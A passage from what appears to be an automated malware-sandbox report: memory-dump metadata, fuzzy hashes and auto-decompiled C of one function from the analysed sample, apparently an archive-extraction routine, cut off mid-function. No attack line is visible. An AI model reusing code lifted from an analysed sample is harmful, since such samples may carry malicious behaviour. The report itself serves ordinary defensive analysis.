                                            • ExitProcess.KERNEL32 ref: 00C56B2D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Process$CurrentExitTerminate
                                            • String ID:
                                            • API String ID: 1703294689-0
                                            • Opcode ID: 19933b4998fe499f41893e154cf1d18c5db5d9d6d537a5e26cd7cbed49d2b693
                                            • Instruction ID: 13c9158d9f82e41b1f107071da5718b281644ca3646d3d93d45bec436291970c
                                            • Opcode Fuzzy Hash: 19933b4998fe499f41893e154cf1d18c5db5d9d6d537a5e26cd7cbed49d2b693
                                            • Instruction Fuzzy Hash: 35E04639000508ABCF216FA1DD09B4C3F69EB00342B404410FE058B131CB75ED86EA64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C383C0, Relevance: 3.9, APIs: 2, Instructions: 940COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 68%
                                            			E00C383C0(intOrPtr __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t370;
				signed int _t374;
				signed int _t375;
				signed int _t380;
				signed int _t385;
				void* _t387;
				signed int _t388;
				signed int _t392;
				signed int _t393;
				signed int _t398;
				signed int _t403;
				signed int _t404;
				signed int _t408;
				signed int _t418;
				signed int _t419;
				signed int _t422;
				signed int _t423;
				signed int _t432;
				char _t434;
				char _t436;
				signed int _t437;
				signed int _t438;
				signed int _t460;
				signed int _t469;
				intOrPtr _t472;
				char _t479;
				signed int _t480;
				void* _t491;
				void* _t499;
				void* _t501;
				signed int _t511;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t520;
				signed int _t523;
				signed int _t531;
				signed int _t541;
				signed int _t543;
				signed int _t545;
				signed int _t547;
				signed char _t548;
				signed int _t551;
				void* _t556;
				signed int _t564;
				intOrPtr* _t574;
				intOrPtr _t576;
				signed int _t577;
				signed int _t586;
				intOrPtr _t589;
				signed int _t592;
				signed int _t601;
				signed int _t608;
				signed int _t610;
				signed int _t611;
				signed int _t613;
				signed int _t631;
				signed int _t632;
				void* _t639;
				void* _t640;
				signed int _t656;
				signed int _t667;
				intOrPtr _t668;
				void* _t670;
				signed int _t671;
				signed int _t672;
				signed int _t673;
				signed int _t674;
				signed int _t675;
				signed int _t681;
				intOrPtr _t683;
				signed int _t688;
				intOrPtr _t690;
				signed int _t692;
				signed int _t696;
				void* _t698;
				signed int _t699;
				signed int _t702;
				signed int _t703;
				void* _t706;
				void* _t708;
				void* _t710;

				_t576 = __ecx;
				E00C4D870(E00C612F2, _t706);
				E00C4D940();
				_t574 =  *((intOrPtr*)(_t706 + 8));
				_t665 = 0;
				_t683 = _t576;
				 *((intOrPtr*)(_t706 - 0x20)) = _t683;
				_t370 =  *( *(_t683 + 8) + 0x82f2) & 0x0000ffff;
				 *(_t706 - 0x18) = _t370;
				if( *(_t706 + 0xc) != 0) {
					L6:
					_t690 =  *((intOrPtr*)(_t574 + 0x21dc));
					__eflags = _t690 - 2;
					if(_t690 == 2) {
						 *(_t683 + 0x10f5) = _t665;
						__eflags =  *(_t574 + 0x32dc) - _t665;
						if(__eflags > 0) {
							L22:
							__eflags =  *(_t574 + 0x32e4) - _t665;
							if(__eflags > 0) {
								L26:
								_t577 =  *(_t683 + 8);
								__eflags =  *((intOrPtr*)(_t577 + 0x615c)) - _t665;
								if( *((intOrPtr*)(_t577 + 0x615c)) != _t665) {
									L29:
									 *(_t706 - 0x11) = _t665;
									_t35 = _t706 - 0x51a8; // -18856
									_t36 = _t706 - 0x11; // 0x7ef
									_t374 = E00C35C80(_t577, _t574 + 0x2280, _t36, 6, _t665, _t35, 0x800);
									__eflags = _t374;
									_t375 = _t374 & 0xffffff00 | _t374 != 0x00000000;
									 *(_t706 - 0x10) = _t375;
									__eflags = _t375;
									if(_t375 != 0) {
										__eflags =  *(_t706 - 0x11);
										if( *(_t706 - 0x11) == 0) {
											__eflags = 0;
											 *((char*)(_t683 + 0xf1)) = 0;
										}
									}
									E00C31F1B(_t574);
									_push(0x800);
									_t43 = _t706 - 0x113c; // -2364
									_push(_t574 + 0x22a8);
									E00C3AFA3();
									__eflags =  *((char*)(_t574 + 0x3373));
									 *(_t706 - 0x1c) = 1;
									if( *((char*)(_t574 + 0x3373)) == 0) {
										_t380 = E00C32005(_t574);
										__eflags = _t380;
										if(_t380 == 0) {
											_t548 =  *(_t683 + 8);
											__eflags = 1 -  *((intOrPtr*)(_t548 + 0x72bc));
											asm("sbb al, al");
											_t61 = _t706 - 0x10;
											 *_t61 =  *(_t706 - 0x10) &  !_t548;
											__eflags =  *_t61;
										}
									} else {
										_t551 =  *( *(_t683 + 8) + 0x72bc);
										__eflags = _t551 - 1;
										if(_t551 != 1) {
											__eflags =  *(_t706 - 0x11);
											if( *(_t706 - 0x11) == 0) {
												__eflags = _t551;
												 *(_t706 - 0x10) =  *(_t706 - 0x10) & (_t551 & 0xffffff00 | _t551 == 0x00000000) - 0x00000001;
												_push(0);
												_t54 = _t706 - 0x113c; // -2364
												_t556 = E00C3B8F2(_t54);
												_t656 =  *(_t683 + 8);
												__eflags =  *((intOrPtr*)(_t656 + 0x72bc)) - 1 - _t556;
												if( *((intOrPtr*)(_t656 + 0x72bc)) - 1 != _t556) {
													 *(_t706 - 0x10) = 0;
												} else {
													_t57 = _t706 - 0x113c; // -2364
													_push(1);
													E00C3B8F2(_t57);
												}
											}
										}
									}
									 *((char*)(_t683 + 0x5f)) =  *((intOrPtr*)(_t574 + 0x3319));
									 *((char*)(_t683 + 0x60)) = 0;
									asm("sbb eax, [ebx+0x32dc]");
									 *((intOrPtr*)( *_t574 + 0x10))( *((intOrPtr*)(_t574 + 0x6ca8)) -  *(_t574 + 0x32d8),  *((intOrPtr*)(_t574 + 0x6cac)), 0);
									_t667 = 0;
									_t385 = 0;
									 *(_t706 + 0xb) = 0;
									 *(_t706 + 0xc) = 0;
									__eflags =  *(_t706 - 0x10);
									if( *(_t706 - 0x10) != 0) {
										L43:
										_t692 =  *(_t706 - 0x18);
										_t586 =  *((intOrPtr*)( *(_t683 + 8) + 0x61f9));
										_t387 = 0x49;
										__eflags = _t586;
										if(_t586 == 0) {
											L45:
											_t388 = _t667;
											L46:
											__eflags = _t586;
											_t82 = _t706 - 0x113c; // -2364
											_t392 = E00C40FD9(_t586, _t82, (_t388 & 0xffffff00 | _t586 == 0x00000000) & 0x000000ff, _t388,  *(_t706 + 0xc)); // executed
											__eflags = _t392;
											if(__eflags == 0) {
												L219:
												_t393 = 0;
												L16:
												L17:
												 *[fs:0x0] =  *((intOrPtr*)(_t706 - 0xc));
												return _t393;
											}
											 *((intOrPtr*)(_t706 - 0x38)) = _t683 + 0x10f6;
											_t85 = _t706 - 0x113c; // -2364
											E00C380B1(_t683, __eflags, _t574, _t85, _t683 + 0x10f6, 0x800);
											__eflags =  *(_t706 + 0xb);
											if( *(_t706 + 0xb) != 0) {
												L50:
												 *(_t706 + 0xf) = 0;
												L51:
												_t398 =  *(_t683 + 8);
												_t589 = 0x45;
												__eflags =  *((char*)(_t398 + 0x6153));
												_t668 = 0x58;
												 *((intOrPtr*)(_t706 - 0x34)) = _t589;
												 *((intOrPtr*)(_t706 - 0x30)) = _t668;
												if( *((char*)(_t398 + 0x6153)) != 0) {
													L53:
													__eflags = _t692 - _t589;
													if(_t692 == _t589) {
														L55:
														_t96 = _t706 - 0x31a8; // -10664
														E00C36EF9(_t96);
														_push(0);
														_t97 = _t706 - 0x31a8; // -10664
														_t403 = E00C3A1B1(_t96, _t668, __eflags, _t683 + 0x10f6, _t97);
														__eflags = _t403;
														if(_t403 == 0) {
															_t404 =  *(_t683 + 8);
															__eflags =  *((char*)(_t404 + 0x6153));
															_t108 = _t706 + 0xf;
															 *_t108 =  *(_t706 + 0xf) & (_t404 & 0xffffff00 |  *((char*)(_t404 + 0x6153)) != 0x00000000) - 0x00000001;
															__eflags =  *_t108;
															L61:
															_t110 = _t706 - 0x113c; // -2364
															_t408 = E00C37BE2(_t110, _t574, _t110);
															__eflags = _t408;
															if(_t408 != 0) {
																while(1) {
																	__eflags =  *((char*)(_t574 + 0x331b));
																	if( *((char*)(_t574 + 0x331b)) == 0) {
																		goto L65;
																	}
																	_t115 = _t706 - 0x113c; // -2364
																	_t541 = E00C3807D(_t683, _t574);
																	__eflags = _t541;
																	if(_t541 == 0) {
																		 *((char*)(_t683 + 0x20f6)) = 1;
																		goto L219;
																	}
																	L65:
																	_t117 = _t706 - 0x13c; // 0x6c4
																	_t592 = 0x40;
																	memcpy(_t117,  *(_t683 + 8) + 0x5024, _t592 << 2);
																	_t710 = _t708 + 0xc;
																	asm("movsw");
																	_t120 = _t706 - 0x2c; // 0x7d4
																	_t683 =  *((intOrPtr*)(_t706 - 0x20));
																	 *(_t706 - 4) = 0;
																	asm("sbb ecx, ecx");
																	_t127 = _t706 - 0x13c; // 0x6c4
																	E00C3C634(_t683 + 0x10, 0,  *((intOrPtr*)(_t574 + 0x331c)), _t127,  ~( *(_t574 + 0x3320) & 0x000000ff) & _t574 + 0x00003321, _t574 + 0x3331,  *((intOrPtr*)(_t574 + 0x336c)), _t574 + 0x334b, _t120);
																	__eflags =  *((char*)(_t574 + 0x331b));
																	if( *((char*)(_t574 + 0x331b)) == 0) {
																		L73:
																		 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
																		_t146 = _t706 - 0x13c; // 0x6c4
																		L00C3E724(_t146);
																		_t147 = _t706 - 0x2160; // -6496
																		E00C3943C(_t147);
																		_t418 =  *(_t574 + 0x3380);
																		 *(_t706 - 4) = 1;
																		 *(_t706 - 0x24) = _t418;
																		_t670 = 0x50;
																		__eflags = _t418;
																		if(_t418 == 0) {
																			L83:
																			_t419 = E00C32005(_t574);
																			__eflags = _t419;
																			if(_t419 == 0) {
																				_t601 =  *(_t706 + 0xf);
																				__eflags = _t601;
																				if(_t601 == 0) {
																					_t696 =  *(_t706 - 0x18);
																					L96:
																					__eflags =  *((char*)(_t574 + 0x6cb4));
																					if( *((char*)(_t574 + 0x6cb4)) == 0) {
																						__eflags = _t601;
																						if(_t601 == 0) {
																							L212:
																							 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
																							_t358 = _t706 - 0x2160; // -6496
																							E00C3946E(_t358);
																							__eflags =  *(_t706 - 0x10);
																							_t385 =  *(_t706 + 0xf);
																							_t671 =  *(_t706 + 0xb);
																							if( *(_t706 - 0x10) != 0) {
																								_t362 = _t683 + 0xec;
																								 *_t362 =  *(_t683 + 0xec) + 1;
																								__eflags =  *_t362;
																							}
																							L214:
																							__eflags =  *((char*)(_t683 + 0x60));
																							if( *((char*)(_t683 + 0x60)) != 0) {
																								goto L219;
																							}
																							__eflags = _t385;
																							if(_t385 != 0) {
																								L15:
																								_t393 = 1;
																								goto L16;
																							}
																							__eflags =  *((intOrPtr*)(_t574 + 0x6cb4)) - _t385;
																							if( *((intOrPtr*)(_t574 + 0x6cb4)) != _t385) {
																								__eflags = _t671;
																								if(_t671 != 0) {
																									goto L15;
																								}
																								goto L219;
																							}
																							L217:
																							E00C31E3B(_t574);
																							goto L15;
																						}
																						L101:
																						_t422 =  *(_t683 + 8);
																						__eflags =  *((char*)(_t422 + 0x61f9));
																						if( *((char*)(_t422 + 0x61f9)) == 0) {
																							L103:
																							_t423 =  *(_t706 + 0xb);
																							__eflags = _t423;
																							if(_t423 != 0) {
																								L108:
																								 *((char*)(_t706 - 0xf)) = 1;
																								__eflags = _t423;
																								if(_t423 != 0) {
																									L110:
																									 *((intOrPtr*)(_t683 + 0xe8)) =  *((intOrPtr*)(_t683 + 0xe8)) + 1;
																									 *((intOrPtr*)(_t683 + 0x80)) = 0;
																									 *((intOrPtr*)(_t683 + 0x84)) = 0;
																									 *((intOrPtr*)(_t683 + 0x88)) = 0;
																									 *((intOrPtr*)(_t683 + 0x8c)) = 0;
																									E00C3A728(_t683 + 0xc8, _t670,  *((intOrPtr*)(_t574 + 0x32f0)),  *((intOrPtr*)( *(_t683 + 8) + 0x82d8)));
																									E00C3A728(_t683 + 0xa0, _t670,  *((intOrPtr*)(_t574 + 0x32f0)),  *((intOrPtr*)( *(_t683 + 8) + 0x82d8)));
																									_t698 = _t683 + 0x10;
																									 *(_t683 + 0x30) =  *(_t574 + 0x32d8);
																									_t217 = _t706 - 0x2160; // -6496
																									 *(_t683 + 0x34) =  *(_t574 + 0x32dc);
																									E00C3C67C(_t698, _t574, _t217);
																									_t672 =  *((intOrPtr*)(_t706 - 0xf));
																									_t608 = 0;
																									_t432 =  *(_t706 + 0xb);
																									 *((char*)(_t683 + 0x39)) = _t672;
																									 *((char*)(_t683 + 0x3a)) = _t432;
																									 *(_t706 - 0x1c) = 0;
																									 *(_t706 - 0x28) = 0;
																									__eflags = _t672;
																									if(_t672 != 0) {
																										L127:
																										_t673 =  *(_t683 + 8);
																										__eflags =  *((char*)(_t673 + 0x6198));
																										 *((char*)(_t706 - 0x214d)) =  *((char*)(_t673 + 0x6198)) == 0;
																										__eflags =  *((char*)(_t706 - 0xf));
																										if( *((char*)(_t706 - 0xf)) != 0) {
																											L131:
																											_t434 = 1;
																											__eflags = 1;
																											L132:
																											__eflags =  *(_t706 - 0x24);
																											 *((char*)(_t706 - 0xe)) = _t608;
																											 *((char*)(_t706 - 0x12)) = _t434;
																											 *((char*)(_t706 - 0xd)) = _t434;
																											if( *(_t706 - 0x24) == 0) {
																												__eflags =  *(_t574 + 0x3318);
																												if( *(_t574 + 0x3318) == 0) {
																													__eflags =  *((char*)(_t574 + 0x22a0));
																													if(__eflags != 0) {
																														E00C42842(_t574,  *((intOrPtr*)(_t683 + 0xe0)), _t706,  *((intOrPtr*)(_t574 + 0x3374)),  *(_t574 + 0x3370) & 0x000000ff);
																														_t472 =  *((intOrPtr*)(_t683 + 0xe0));
																														 *(_t472 + 0x4c48) =  *(_t574 + 0x32e0);
																														__eflags = 0;
																														 *(_t472 + 0x4c4c) =  *(_t574 + 0x32e4);
																														 *((char*)(_t472 + 0x4c60)) = 0;
																														E00C424D9( *((intOrPtr*)(_t683 + 0xe0)),  *((intOrPtr*)(_t574 + 0x229c)),  *(_t574 + 0x3370) & 0x000000ff);
																													} else {
																														_push( *(_t574 + 0x32e4));
																														_push( *(_t574 + 0x32e0));
																														_push(_t698);
																														E00C3910B(_t574, _t673, _t683, __eflags);
																													}
																												}
																												L163:
																												E00C31E3B(_t574);
																												__eflags =  *((char*)(_t574 + 0x3319));
																												if( *((char*)(_t574 + 0x3319)) != 0) {
																													L166:
																													_t436 = 0;
																													__eflags = 0;
																													_t610 = 0;
																													L167:
																													__eflags =  *(_t574 + 0x3370);
																													if( *(_t574 + 0x3370) != 0) {
																														__eflags =  *((char*)(_t574 + 0x22a0));
																														if( *((char*)(_t574 + 0x22a0)) == 0) {
																															L175:
																															__eflags =  *(_t706 + 0xb);
																															 *((char*)(_t706 - 0xe)) = _t436;
																															if( *(_t706 + 0xb) != 0) {
																																L185:
																																__eflags =  *(_t706 - 0x24);
																																_t674 =  *((intOrPtr*)(_t706 - 0xd));
																																if( *(_t706 - 0x24) == 0) {
																																	L189:
																																	_t611 = 0;
																																	__eflags = 0;
																																	L190:
																																	__eflags =  *((char*)(_t706 - 0xf));
																																	if( *((char*)(_t706 - 0xf)) != 0) {
																																		goto L212;
																																	}
																																	_t699 =  *(_t706 - 0x18);
																																	__eflags = _t699 -  *((intOrPtr*)(_t706 - 0x30));
																																	if(_t699 ==  *((intOrPtr*)(_t706 - 0x30))) {
																																		L193:
																																		__eflags =  *(_t706 - 0x24);
																																		if( *(_t706 - 0x24) == 0) {
																																			L197:
																																			__eflags = _t436;
																																			if(_t436 == 0) {
																																				L200:
																																				__eflags = _t611;
																																				if(_t611 != 0) {
																																					L208:
																																					_t437 =  *(_t683 + 8);
																																					__eflags =  *((char*)(_t437 + 0x61a0));
																																					if( *((char*)(_t437 + 0x61a0)) == 0) {
																																						_t700 = _t683 + 0x10f6;
																																						_t438 = E00C3A12F(_t683 + 0x10f6,  *((intOrPtr*)(_t574 + 0x22a4))); // executed
																																						__eflags = _t438;
																																						if(__eflags == 0) {
																																							E00C36BF5(__eflags, 0x11, _t574 + 0x1e, _t700);
																																						}
																																					}
																																					 *(_t683 + 0x10f5) = 1;
																																					goto L212;
																																				}
																																				_t675 =  *(_t706 - 0x28);
																																				__eflags = _t675;
																																				_t613 =  *(_t706 - 0x1c);
																																				if(_t675 > 0) {
																																					L203:
																																					__eflags = _t436;
																																					if(_t436 != 0) {
																																						L206:
																																						_t331 = _t706 - 0x2160; // -6496
																																						E00C39BD6(_t331);
																																						L207:
																																						_t688 = _t574 + 0x32c0;
																																						asm("sbb eax, eax");
																																						asm("sbb ecx, ecx");
																																						asm("sbb eax, eax");
																																						_t339 = _t706 - 0x2160; // -6496
																																						E00C39A7E(_t339, _t574 + 0x32d0,  ~( *( *(_t683 + 8) + 0x72c8)) & _t688,  ~( *( *(_t683 + 8) + 0x72cc)) & _t574 + 0x000032c8,  ~( *( *(_t683 + 8) + 0x72d0)) & _t574 + 0x000032d0);
																																						_t340 = _t706 - 0x2160; // -6496
																																						E00C394DA(_t340);
																																						E00C37A12( *((intOrPtr*)(_t706 - 0x20)),  *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)), _t574,  *((intOrPtr*)(_t706 - 0x38)));
																																						asm("sbb eax, eax");
																																						asm("sbb eax, eax");
																																						__eflags =  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t688;
																																						E00C39A7B( ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t688,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t688,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72d0)) & _t574 + 0x000032d0);
																																						_t683 =  *((intOrPtr*)(_t706 - 0x20));
																																						goto L208;
																																					}
																																					__eflags =  *((intOrPtr*)(_t683 + 0x88)) - _t613;
																																					if( *((intOrPtr*)(_t683 + 0x88)) != _t613) {
																																						goto L206;
																																					}
																																					__eflags =  *((intOrPtr*)(_t683 + 0x8c)) - _t675;
																																					if( *((intOrPtr*)(_t683 + 0x8c)) == _t675) {
																																						goto L207;
																																					}
																																					goto L206;
																																				}
																																				__eflags = _t613;
																																				if(_t613 == 0) {
																																					goto L207;
																																				}
																																				goto L203;
																																			}
																																			_t460 =  *(_t683 + 8);
																																			__eflags =  *((char*)(_t460 + 0x6198));
																																			if( *((char*)(_t460 + 0x6198)) == 0) {
																																				goto L212;
																																			}
																																			_t436 =  *((intOrPtr*)(_t706 - 0xe));
																																			goto L200;
																																		}
																																		__eflags = _t611;
																																		if(_t611 != 0) {
																																			goto L197;
																																		}
																																		__eflags =  *(_t574 + 0x3380) - 5;
																																		if( *(_t574 + 0x3380) != 5) {
																																			goto L212;
																																		}
																																		__eflags = _t674;
																																		if(_t674 == 0) {
																																			goto L212;
																																		}
																																		goto L197;
																																	}
																																	__eflags = _t699 -  *((intOrPtr*)(_t706 - 0x34));
																																	if(_t699 !=  *((intOrPtr*)(_t706 - 0x34))) {
																																		goto L212;
																																	}
																																	goto L193;
																																}
																																__eflags =  *(_t574 + 0x3380) - 4;
																																if( *(_t574 + 0x3380) != 4) {
																																	goto L189;
																																}
																																__eflags = _t674;
																																if(_t674 == 0) {
																																	goto L189;
																																}
																																_t611 = 1;
																																goto L190;
																															}
																															__eflags =  *((char*)(_t706 - 0x12));
																															if( *((char*)(_t706 - 0x12)) == 0) {
																																goto L185;
																															}
																															__eflags = _t610;
																															if(_t610 != 0) {
																																goto L185;
																															}
																															__eflags =  *((intOrPtr*)(_t574 + 0x331b)) - _t610;
																															if(__eflags == 0) {
																																L183:
																																_t311 = _t706 - 0x113c; // -2364
																																_push(_t574 + 0x1e);
																																_push(3);
																																L184:
																																E00C36BF5(__eflags);
																																 *((char*)(_t706 - 0xe)) = 1;
																																E00C36E03(0xc700e0, 3);
																																_t436 =  *((intOrPtr*)(_t706 - 0xe));
																																goto L185;
																															}
																															__eflags =  *((intOrPtr*)(_t574 + 0x3341)) - _t610;
																															if( *((intOrPtr*)(_t574 + 0x3341)) == _t610) {
																																L181:
																																__eflags =  *((char*)(_t683 + 0xf3));
																																if(__eflags != 0) {
																																	goto L183;
																																}
																																_t309 = _t706 - 0x113c; // -2364
																																_push(_t574 + 0x1e);
																																_push(4);
																																goto L184;
																															}
																															__eflags =  *(_t574 + 0x6cc4) - _t610;
																															if(__eflags == 0) {
																																goto L183;
																															}
																															goto L181;
																														}
																														__eflags =  *(_t574 + 0x32e4) - _t436;
																														if(__eflags < 0) {
																															goto L175;
																														}
																														if(__eflags > 0) {
																															L173:
																															__eflags = _t610;
																															if(_t610 != 0) {
																																 *((char*)(_t683 + 0xf3)) = 1;
																															}
																															goto L175;
																														}
																														__eflags =  *(_t574 + 0x32e0) - _t436;
																														if( *(_t574 + 0x32e0) <= _t436) {
																															goto L175;
																														}
																														goto L173;
																													}
																													 *((char*)(_t683 + 0xf3)) = _t436;
																													goto L175;
																												}
																												asm("sbb edx, edx");
																												_t469 = E00C3A6F6(_t683 + 0xc8, _t683, _t574 + 0x32f0,  ~( *(_t574 + 0x334a) & 0x000000ff) & _t574 + 0x0000334b);
																												__eflags = _t469;
																												if(_t469 == 0) {
																													goto L166;
																												}
																												_t610 = 1;
																												_t436 = 0;
																												goto L167;
																											}
																											_t702 =  *(_t574 + 0x3380);
																											__eflags = _t702 - 4;
																											if(__eflags == 0) {
																												L146:
																												_t262 = _t706 - 0x41a8; // -14760
																												E00C380B1(_t683, __eflags, _t574, _t574 + 0x3384, _t262, 0x800);
																												_t608 =  *((intOrPtr*)(_t706 - 0xe));
																												__eflags = _t608;
																												if(_t608 == 0) {
																													L153:
																													_t479 =  *((intOrPtr*)(_t706 - 0xd));
																													L154:
																													__eflags =  *((intOrPtr*)(_t574 + 0x6cb0)) - 2;
																													if( *((intOrPtr*)(_t574 + 0x6cb0)) != 2) {
																														L141:
																														__eflags = _t608;
																														if(_t608 == 0) {
																															L157:
																															_t480 = 0;
																															__eflags = 0;
																															L158:
																															 *(_t683 + 0x10f5) = _t480;
																															goto L163;
																														}
																														L142:
																														__eflags = _t479;
																														if(_t479 == 0) {
																															goto L157;
																														}
																														_t480 = 1;
																														goto L158;
																													}
																													__eflags = _t608;
																													if(_t608 != 0) {
																														goto L142;
																													}
																													L140:
																													 *((char*)(_t706 - 0x12)) = 0;
																													goto L141;
																												}
																												__eflags =  *((short*)(_t706 - 0x41a8));
																												if( *((short*)(_t706 - 0x41a8)) == 0) {
																													goto L153;
																												}
																												_t266 = _t706 - 0x41a8; // -14760
																												_push(0x800);
																												_push(_t683 + 0x10f6);
																												__eflags = _t702 - 4;
																												if(__eflags != 0) {
																													_push(_t574 + 0x1e);
																													_t269 = _t706 - 0x2160; // -6496
																													_t479 = E00C39049(_t673, __eflags);
																												} else {
																													_t479 = E00C374DD(_t608, __eflags);
																												}
																												L151:
																												 *((char*)(_t706 - 0xd)) = _t479;
																												__eflags = _t479;
																												if(_t479 == 0) {
																													L139:
																													_t608 =  *((intOrPtr*)(_t706 - 0xe));
																													goto L140;
																												}
																												_t608 =  *((intOrPtr*)(_t706 - 0xe));
																												goto L154;
																											}
																											__eflags = _t702 - 5;
																											if(__eflags == 0) {
																												goto L146;
																											}
																											__eflags = _t702 - _t434;
																											if(_t702 == _t434) {
																												L144:
																												__eflags = _t608;
																												if(_t608 == 0) {
																													goto L153;
																												}
																												_push(_t683 + 0x10f6);
																												_t479 = E00C3774C(_t673, _t683 + 0x10, _t574);
																												goto L151;
																											}
																											__eflags = _t702 - 2;
																											if(_t702 == 2) {
																												goto L144;
																											}
																											__eflags = _t702 - 3;
																											if(__eflags == 0) {
																												goto L144;
																											}
																											E00C36BF5(__eflags, 0x47, _t574 + 0x1e, _t683 + 0x10f6);
																											__eflags = 0;
																											_t479 = 0;
																											 *((char*)(_t706 - 0xd)) = 0;
																											goto L139;
																										}
																										__eflags = _t432;
																										if(_t432 != 0) {
																											goto L131;
																										}
																										_t491 = 0x50;
																										__eflags =  *(_t706 - 0x18) - _t491;
																										if( *(_t706 - 0x18) == _t491) {
																											goto L131;
																										}
																										_t434 = 1;
																										_t608 = 1;
																										goto L132;
																									}
																									__eflags =  *(_t574 + 0x6cc4);
																									if( *(_t574 + 0x6cc4) != 0) {
																										goto L127;
																									}
																									_t703 =  *(_t574 + 0x32e4);
																									_t681 =  *(_t574 + 0x32e0);
																									__eflags = _t703;
																									if(__eflags < 0) {
																										L126:
																										_t698 = _t683 + 0x10;
																										goto L127;
																									}
																									if(__eflags > 0) {
																										L115:
																										_t631 =  *(_t574 + 0x32d8);
																										_t632 = _t631 << 0xa;
																										__eflags = ( *(_t574 + 0x32dc) << 0x00000020 | _t631) << 0xa - _t703;
																										if(__eflags < 0) {
																											L125:
																											_t432 =  *(_t706 + 0xb);
																											_t608 = 0;
																											__eflags = 0;
																											goto L126;
																										}
																										if(__eflags > 0) {
																											L118:
																											__eflags = _t703;
																											if(__eflags < 0) {
																												L124:
																												_t237 = _t706 - 0x2160; // -6496
																												E00C398D5(_t237,  *(_t574 + 0x32e0),  *(_t574 + 0x32e4));
																												 *(_t706 - 0x1c) =  *(_t574 + 0x32e0);
																												 *(_t706 - 0x28) =  *(_t574 + 0x32e4);
																												goto L125;
																											}
																											if(__eflags > 0) {
																												L121:
																												_t499 = E00C396E1(_t681);
																												__eflags = _t681 -  *(_t574 + 0x32dc);
																												if(__eflags < 0) {
																													goto L125;
																												}
																												if(__eflags > 0) {
																													goto L124;
																												}
																												__eflags = _t499 -  *(_t574 + 0x32d8);
																												if(_t499 <=  *(_t574 + 0x32d8)) {
																													goto L125;
																												}
																												goto L124;
																											}
																											__eflags = _t681 - 0x5f5e100;
																											if(_t681 < 0x5f5e100) {
																												goto L124;
																											}
																											goto L121;
																										}
																										__eflags = _t632 - _t681;
																										if(_t632 <= _t681) {
																											goto L125;
																										}
																										goto L118;
																									}
																									__eflags = _t681 - 0xf4240;
																									if(_t681 <= 0xf4240) {
																										goto L126;
																									}
																									goto L115;
																								}
																								L109:
																								_t198 = _t683 + 0xe4;
																								 *_t198 =  *(_t683 + 0xe4) + 1;
																								__eflags =  *_t198;
																								goto L110;
																							}
																							 *((char*)(_t706 - 0xf)) = 0;
																							_t501 = 0x50;
																							__eflags = _t696 - _t501;
																							if(_t696 != _t501) {
																								_t192 = _t706 - 0x2160; // -6496
																								__eflags = E00C39745(_t192);
																								if(__eflags != 0) {
																									E00C36BF5(__eflags, 0x3b, _t574 + 0x1e, _t683 + 0x10f6);
																									E00C36E9B(0xc700e0, _t706, _t574 + 0x1e, _t683 + 0x10f6);
																								}
																							}
																							goto L109;
																						}
																						 *(_t683 + 0x10f5) = 1;
																						__eflags =  *((char*)(_t422 + 0x61f9));
																						if( *((char*)(_t422 + 0x61f9)) != 0) {
																							_t423 =  *(_t706 + 0xb);
																							goto L108;
																						}
																						goto L103;
																					}
																					 *(_t706 + 0xb) = 1;
																					 *(_t706 + 0xf) = 1;
																					_t182 = _t706 - 0x113c; // -2364
																					_t511 = E00C40FD9(_t601, _t182, 0, 0, 1);
																					__eflags = _t511;
																					if(_t511 != 0) {
																						goto L101;
																					}
																					__eflags = 0;
																					 *(_t706 - 0x1c) = 0;
																					L99:
																					_t184 = _t706 - 0x2160; // -6496
																					E00C3946E(_t184);
																					_t393 =  *(_t706 - 0x1c);
																					goto L16;
																				}
																				_t174 = _t706 - 0x2160; // -6496
																				_push(_t574);
																				_t515 = E00C37F5F(_t683);
																				_t696 =  *(_t706 - 0x18);
																				_t601 = _t515;
																				 *(_t706 + 0xf) = _t601;
																				L93:
																				__eflags = _t601;
																				if(_t601 != 0) {
																					goto L101;
																				}
																				goto L96;
																			}
																			__eflags =  *(_t706 + 0xf);
																			if( *(_t706 + 0xf) != 0) {
																				_t516 =  *(_t706 - 0x18);
																				__eflags = _t516 - 0x50;
																				if(_t516 != 0x50) {
																					_t639 = 0x49;
																					__eflags = _t516 - _t639;
																					if(_t516 != _t639) {
																						_t640 = 0x45;
																						__eflags = _t516 - _t640;
																						if(_t516 != _t640) {
																							_t517 =  *(_t683 + 8);
																							__eflags =  *((intOrPtr*)(_t517 + 0x6158)) - 1;
																							if( *((intOrPtr*)(_t517 + 0x6158)) != 1) {
																								 *(_t683 + 0xe4) =  *(_t683 + 0xe4) + 1;
																								_t172 = _t706 - 0x113c; // -2364
																								_push(_t574);
																								E00C37D9B(_t683);
																							}
																						}
																					}
																				}
																			}
																			goto L99;
																		}
																		__eflags = _t418 - 5;
																		if(_t418 == 5) {
																			goto L83;
																		}
																		_t601 =  *(_t706 + 0xf);
																		_t696 =  *(_t706 - 0x18);
																		__eflags = _t601;
																		if(_t601 == 0) {
																			goto L96;
																		}
																		__eflags = _t696 - _t670;
																		if(_t696 == _t670) {
																			goto L93;
																		}
																		_t520 =  *(_t683 + 8);
																		__eflags =  *((char*)(_t520 + 0x61f9));
